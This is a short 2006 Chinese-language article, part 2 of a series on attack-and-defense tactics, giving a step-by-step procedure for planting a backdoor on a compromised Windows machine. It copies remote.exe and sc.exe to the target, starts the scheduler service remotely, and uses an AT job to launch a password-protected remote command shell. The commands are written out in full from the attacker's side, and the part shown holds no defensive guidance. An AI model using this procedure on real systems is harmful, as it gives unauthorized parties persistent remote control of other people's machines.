战术攻防思维撷粹(2)

　2006-07-04 20:29:23　来源：WEB开发网　　　

核心提示：**远程作业得到了帐户、种植了Sniffer，但是固执的Blackhat并不因此而禁止他们的控制欲望，战术攻防思维撷粹(2)，后门的威胁也就随之而来，这里我所安装的仅仅是一个简单的远程命令行工具remote.exe，此时你应该具有权限帐号)，2．启动调度服务C:\toolbox>sc \\target_machi

**远程作业

得到了帐户、种植了Sniffer，但是固执的Blackhat并不因此而禁止他们的控制欲望。后门的威胁也就随之而来。这里我所安装的仅仅是一个简单的远程命令行工具remote.exe，它可以使用/C参数来启动客户模式，而使用/S来启动服务器模式，因此在远程机器使用AT指令设置了启动时间。假如服务器没有启动调度服务，那么使用sc.exe使其启动，剩下的工作就让调度为我们工作，步骤简叙如下：

1．拷贝remote.exe和sc.exe到目标机器，方法很多，诸如使用net use等方法(记住，此时你应该具有权限帐号)。

2．启动调度服务

C:\toolbox>sc \\target_machine start schedule

3．检查目标系统的时间，方便对时

C:\toolbox>net time \\target_machine

Current time at \\target_machine is {date} {time} {PM/AM}

……

4．使用AT指令在目标上启动remote.exe服务

C:\toolbox>at \\target_machine {time} ““remote /s cmd passwd””

Added a new job with job ID=13

5．测试服务 C:\toolbox>remote /c {target_ip_addr} passwd

**************************************